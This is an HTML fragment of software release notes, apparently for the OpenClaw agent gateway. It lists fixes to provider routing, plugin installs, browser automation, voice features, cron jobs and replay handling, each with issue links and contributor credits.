<li>Providers/MiniMax: register <code>minimax-portal</code> for music and video generation, preserving OAuth auth and regional MiniMax base URLs across the shared <code>music_generate</code> and <code>video_generate</code> tools. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226014254" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63241" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63241/hovercard" href="https://github.com/openclaw/openclaw/pull/63241">#63241</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tars90percent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tars90percent">@tars90percent</a>.</li>
<li>Providers/onboarding: keep Runway and Alibaba Model Studio out of the text-inference setup picker by scoping their video-generation auth choices to the media setup flow. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253432057" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65856" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65856/hovercard" href="https://github.com/openclaw/openclaw/pull/65856">#65856</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</li>
<li>Plugins/Bonjour: stop the gateway from crash-looping on <code>CIAO PROBING CANCELLED</code> when the mDNS watchdog cancels a stuck probe. Restores the rejection-handler wiring dropped during the bonjour plugin migration and shares unhandled-rejection state across module instances so plugin-staged copies of <code>openclaw/plugin-sdk/runtime</code> register into the same handler set the host consults. Especially affects Docker on macOS, where mDNS probing reliably hits the watchdog. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/troyhitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/troyhitch">@troyhitch</a>.</li>
<li>Google Meet: report pinned Chrome nodes as offline or missing capabilities in setup/join diagnostics, keep inaccessible nodes out of auto-selection, and preflight local BlackHole/SoX requirements before agents try local Chrome.</li>
<li>Providers/MiniMax: route <code>image-01</code> requests to the dedicated image generation endpoint while preserving CN endpoint selection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206267950" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61149" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61149/hovercard" href="https://github.com/openclaw/openclaw/issues/61149">#61149</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mushuiyu886/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mushuiyu886">@mushuiyu886</a>.</li>
<li>Plugins/startup: remove ownerless bundled runtime-dependency install locks after a short grace window and include lock owner details when startup times out waiting for a plugin runtime-deps lock.</li>
<li>Plugins/install: anchor bundled runtime-dependency npm installs with an OpenClaw-owned package manifest so Linux updates cannot accidentally write to a parent <code>$HOME/node_modules</code> tree. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329067622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71730" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71730/hovercard" href="https://github.com/openclaw/openclaw/issues/71730">#71730</a>.</li>
<li>Plugins/install: pass onboarding plugin config into plugin index writes so local plugin installs outside default discovery roots keep their install records. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: migrate shipped <code>plugins.installs</code> config records into the plugin index while stripping them from runtime config and future writes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: durably remove shipped <code>plugins.installs</code> from <code>openclaw.json</code> after its records are copied into the plugin index, while rolling back the index write if config cleanup fails. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: keep migrated plugin install records in the plugin index even when the plugin manifest is missing or invalid, so update, uninstall, inspect, and audit can still recover broken installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/security: keep plugin audit JSON check ids stable while reporting plugin index install-record findings with updated wording. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/config: reject direct <code>plugins.installs</code> edits with guidance to use <code>openclaw plugins install</code>, <code>openclaw plugins update</code>, or <code>openclaw plugins uninstall</code> instead. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Live tests/voice: accept common STT variants for OpenClaw and ElevenLabs brand names so provider smoke tests fail on real regressions rather than equivalent transcripts.</li>
<li>Agents/replies: forward sanitized underlying agent failure details on external channels instead of replacing unknown failures with a generic retry message.</li>
<li>CLI/MCP: translate OpenClaw <code>mcp.servers.*.transport</code> entries into Claude/Gemini CLI <code>type</code> fields so streamable HTTP MCP servers load in CLI backend sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329018159" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71724/hovercard" href="https://github.com/openclaw/openclaw/pull/71724">#71724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Blockchain-Oracle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Blockchain-Oracle">@Blockchain-Oracle</a>.</li>
<li>Browser/CDP: honor configured remote and <code>attachOnly</code> CDP HTTP/WebSocket timeouts when opening tabs through raw CDP or <code>/json/new</code> fallback. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132440350" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54238" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54238/hovercard" href="https://github.com/openclaw/openclaw/pull/54238">#54238</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FuncWei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FuncWei">@FuncWei</a>.</li>
<li>WhatsApp/TTS: send visible text separately from PTT voice-note audio instead of relying on hidden voice-note captions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108175128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51081" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51081/hovercard" href="https://github.com/openclaw/openclaw/issues/51081">#51081</a>.</li>
<li>Browser/client: avoid telling agents to restart OpenClaw for dispatcher timeouts on external browser profiles such as <code>attachOnly</code>, remote CDP, and existing-session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4044411472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40815" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40815/hovercard" href="https://github.com/openclaw/openclaw/pull/40815">#40815</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xsline/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xsline">@0xsline</a>.</li>
<li>Agents/TTS: preserve <code>[[audio_as_voice]]</code> directives on trusted text tool-result <code>MEDIA:</code> payloads so generated audio still delivers as a voice note. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076576982" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46535" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46535/hovercard" href="https://github.com/openclaw/openclaw/pull/46535">#46535</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/azade-c/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/azade-c">@azade-c</a>.</li>
<li>Agents/TTS: keep queued tool media when an assistant ends with <code>NO_REPLY</code> on non-block delivery paths, so media-only generated audio replies still send. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198016737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60025" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60025/hovercard" href="https://github.com/openclaw/openclaw/pull/60025">#60025</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bradlind1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bradlind1">@bradlind1</a>.</li>
<li>Telegram/STT: frame inbound voice-note transcripts as machine-generated, untrusted text in agent context while preserving raw transcript mention detection. Closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4018090172" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33360/hovercard" href="https://github.com/openclaw/openclaw/issues/33360">#33360</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/smartchainark/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/smartchainark">@smartchainark</a>.</li>
<li>Subagents/browser: show an actionable <code>/tools</code> notice when browser automation is configured but filtered out by the active tool profile, and document that coding-profile agents should use <code>tools.alsoAllow: ["browser"]</code> rather than subagent allowlists alone.</li>
<li>Control UI/Quick Settings: persist the assistant avatar override to browser local storage (mirroring the user avatar) so uploaded image data URLs no longer fail config validation with "Too big: expected string to have &lt;=200 characters". Also lift the gateway-side <code>ui.assistant.avatar</code> length cap to match the user avatar size budget for non-UI clients writing the field directly. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Plugin SDK: share diagnostic event subscriptions across duplicate source/dist module graphs so legacy root SDK imports still receive runtime diagnostic events.</li>
<li>Agents/Bedrock: prevent empty assistant stream-error turns from poisoning Converse replay by persisting, repairing, and replaying a non-empty fallback block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328056829" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71572" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71572/hovercard" href="https://github.com/openclaw/openclaw/issues/71572">#71572</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328448230" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71627" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71627/hovercard" href="https://github.com/openclaw/openclaw/pull/71627">#71627</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Agents/Anthropic/Bedrock: strip thinking blocks with missing, empty, or blank replay signatures before provider conversion, falling back to non-empty omitted-reasoning text when needed so corrupted signed-thinking history no longer poisons subsequent turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4070310932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45010" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45010/hovercard" href="https://github.com/openclaw/openclaw/issues/45010">#45010</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307495974" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70054" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70054/hovercard" href="https://github.com/openclaw/openclaw/pull/70054">#70054</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/castaples/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/castaples">@castaples</a>.</li>
<li>Agents/Anthropic/Bedrock: preserve stripped thinking-only assistant replay turns with non-empty omitted-reasoning text so provider adapters keep strict user/assistant turn shape. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wujiaming88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wujiaming88">@wujiaming88</a>.</li>
<li>ACP/Codex: pass <code>sessions_spawn(runtime="acp")</code> model and thinking overrides into Codex ACP startup, normalize <code>openai-codex/*</code> refs and slash reasoning suffixes, and recognize managed Codex ACP wrapper commands without blocking current <code>gpt-5.5</code> sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042597081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40393" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40393/hovercard" href="https://github.com/openclaw/openclaw/issues/40393">#40393</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328579948" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71643" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71643/hovercard" href="https://github.com/openclaw/openclaw/pull/71643">#71643</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/91wan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/91wan">@91wan</a>.</li>
<li>Browser/CDP: make readiness diagnostics use the same discovery-first fallback as reachability for bare <code>ws://</code> Browserless and Browserbase CDP URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299797320" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69532/hovercard" href="https://github.com/openclaw/openclaw/issues/69532">#69532</a>.</li>
<li>Browser/CDP: explain that loopback Browserless or other externally managed CDP services need <code>attachOnly: true</code> and matching Browserless <code>EXTERNAL</code> endpoint when reporting local port ownership conflicts, and fall back to the configured bare WebSocket root when a discovered Browserless endpoint rejects CDP. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095070385" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49815" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49815/hovercard" href="https://github.com/openclaw/openclaw/issues/49815">#49815</a>.</li>
<li>Gateway/reload: preserve indefinite <code>gateway.reload.deferralTimeoutMs: 0</code> semantics for channel hot reload deferrals so active agent runs are not interrupted by a forced channel restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328540681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71637" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71637/hovercard" href="https://github.com/openclaw/openclaw/pull/71637">#71637</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Poo-Squirry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Poo-Squirry">@Poo-Squirry</a>.</li>
<li>Agents/tool results: cap persisted Pi tool-result details and strip hidden diagnostics before provider conversion, preventing large debug payloads from bloating session transcripts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328540681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71637" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71637/hovercard" href="https://github.com/openclaw/openclaw/pull/71637">#71637</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Poo-Squirry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Poo-Squirry">@Poo-Squirry</a>.</li>
<li>ACP/OpenCode: update the bundled acpx runtime to 0.6.0 and cover the OpenCode ACP bind path in Docker live tests.</li>
<li>Providers/OpenCode Go: add DeepSeek V4 Pro and DeepSeek V4 Flash to the Go catalog while the bundled Pi registry catches up. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328161792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71587/hovercard" href="https://github.com/openclaw/openclaw/issues/71587">#71587</a>.</li>
<li>Providers/OpenCode Go: route DeepSeek V4 Pro/Flash through the OpenAI-compatible Go endpoint and suppress invalid <code>reasoning_effort: "off"</code> payloads, fixing tool-enabled requests for <code>opencode-go/deepseek-v4-flash</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328769808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71683" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71683/hovercard" href="https://github.com/openclaw/openclaw/issues/71683">#71683</a>.</li>
<li>Plugins/model defaults: run Skill Workshop review, Active Memory recall, and session-memory slug generation on the configured agent default model instead of the hardcoded OpenAI SDK fallback when hook context lacks model metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328679241" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71659" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71659/hovercard" href="https://github.com/openclaw/openclaw/issues/71659">#71659</a>.</li>
<li>Providers/Venice: fill the required DeepSeek V4 <code>reasoning_content</code> placeholder for <code>venice/deepseek-v4-pro</code> and <code>venice/deepseek-v4-flash</code> replay turns without sending native DeepSeek <code>thinking</code> controls that Venice rejects. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328450187" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71628" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71628/hovercard" href="https://github.com/openclaw/openclaw/issues/71628">#71628</a>.</li>
<li>Browser/existing-session: support per-profile Chrome MCP command/args, map <code>cdpUrl</code> to <code>--browserUrl</code> or <code>--wsEndpoint</code>, and avoid combining endpoint flags with <code>--userDataDir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080120284" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47879/hovercard" href="https://github.com/openclaw/openclaw/issues/47879">#47879</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080995803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48037" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48037/hovercard" href="https://github.com/openclaw/openclaw/issues/48037">#48037</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4220547110" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62706" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62706/hovercard" href="https://github.com/openclaw/openclaw/issues/62706">#62706</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/puneet1409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/puneet1409">@puneet1409</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhehao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhehao">@zhehao</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/madkow1001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/madkow1001">@madkow1001</a>.</li>
<li>Media/plugins: bound MIME sniffing and ZIP archive preflight before handing untrusted files to <code>file-type</code> or <code>jszip</code>, reducing parser CPU and memory exposure for attachments and ClawHub plugin archives. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Memory-host SDK: use trusted env-proxy mode for remote embedding and batch HTTP calls only when Undici will proxy that target, preserving SSRF DNS pinning for <code>ALL_PROXY</code>-only and <code>NO_PROXY</code> bypass cases. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115438877" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52162/hovercard" href="https://github.com/openclaw/openclaw/issues/52162">#52162</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327688904" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71506/hovercard" href="https://github.com/openclaw/openclaw/pull/71506">#71506</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DhtIsCoding/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DhtIsCoding">@DhtIsCoding</a>.</li>
<li>Gateway/dashboard: render Control UI and WebSocket links with <code>https://</code>/<code>wss://</code> when <code>gateway.tls.enabled=true</code>, including <code>openclaw gateway status</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327630185" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71494" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71494/hovercard" href="https://github.com/openclaw/openclaw/issues/71494">#71494</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327660439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71499/hovercard" href="https://github.com/openclaw/openclaw/pull/71499">#71499</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deepkilo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deepkilo">@deepkilo</a>.</li>
<li>Agents/OpenAI-compatible: default proxy/local completions tool requests to <code>tool_choice: "auto"</code> when tools are present, so providers enter native tool-calling mode instead of replying with plain-text tool directives. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327534098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71472/hovercard" href="https://github.com/openclaw/openclaw/pull/71472">#71472</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Speed-maker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Speed-maker">@Speed-maker</a>.</li>
<li>OpenAI image generation: use <code>gpt-5.5</code> for the Codex OAuth responses transport instead of the retired <code>gpt-5.4</code> model, fixing 500s from ChatGPT Codex image generation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327703791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71513/hovercard" href="https://github.com/openclaw/openclaw/issues/71513">#71513</a>. Thanks @baolongl.</li>
<li>OpenAI image generation: route transparent-background default-model requests to <code>gpt-image-1.5</code>, document the expected <code>image_generate</code> call shape, and keep Azure/custom OpenAI-compatible deployment names untouched.</li>
<li>Google video generation: download direct MLDev Veo <code>video.uri</code> results instead of passing them through the Files API path, fixing 404s after successful generation/polling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324817492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71200" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71200/hovercard" href="https://github.com/openclaw/openclaw/issues/71200">#71200</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/panhaishan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/panhaishan">@panhaishan</a>.</li>
<li>Google video generation: fall back to the REST <code>predictLongRunning</code> Veo endpoint for text-only SDK 404s while keeping reference image/video generation on the SDK path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215587624" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62309/hovercard" href="https://github.com/openclaw/openclaw/issues/62309">#62309</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222914272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63008" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63008/hovercard" href="https://github.com/openclaw/openclaw/issues/63008">#63008</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216005545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62343" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62343/hovercard" href="https://github.com/openclaw/openclaw/pull/62343">#62343</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leoleedev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leoleedev">@leoleedev</a>.</li>
<li>MiniMax music generation: switch the bundled default model from the unsupported <code>music-2.5+</code> id to the current <code>music-2.6</code> API model. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245010440" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64870/hovercard" href="https://github.com/openclaw/openclaw/issues/64870">#64870</a> and addresses the music default from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215652478" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62315/hovercard" href="https://github.com/openclaw/openclaw/issues/62315">#62315</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/noahclanman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/noahclanman">@noahclanman</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/edwardzheng1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/edwardzheng1">@edwardzheng1</a>.</li>
<li>Cron: record jobs interrupted by a gateway restart as failed at their original <code>runningAtMs</code>, skip unsafe startup replay, and disable interrupted one-shot jobs so they show a visible failure instead of silently disappearing or duplicating work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187207893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59056" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59056/hovercard" href="https://github.com/openclaw/openclaw/issues/59056">#59056</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207476732" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61343" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61343/hovercard" href="https://github.com/openclaw/openclaw/issues/61343">#61343</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231039858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63657" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63657/hovercard" href="https://github.com/openclaw/openclaw/issues/63657">#63657</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190617901" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59301" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59301/hovercard" href="https://github.com/openclaw/openclaw/issues/59301">#59301</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ponchoooPenguin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ponchoooPenguin">@ponchoooPenguin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daemic24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daemic24">@daemic24</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/myradon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/myradon">@myradon</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hikiwibot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hikiwibot">@hikiwibot</a>.</li>
<li>Cron tool: recover flat top-level schedule shorthand such as <code>cron</code>, <code>tz</code>, and <code>staggerMs</code> before gateway validation, so model-generated cron add/update calls preserve cron jitter settings. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyxben/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyxben">@tyxben</a>.</li>
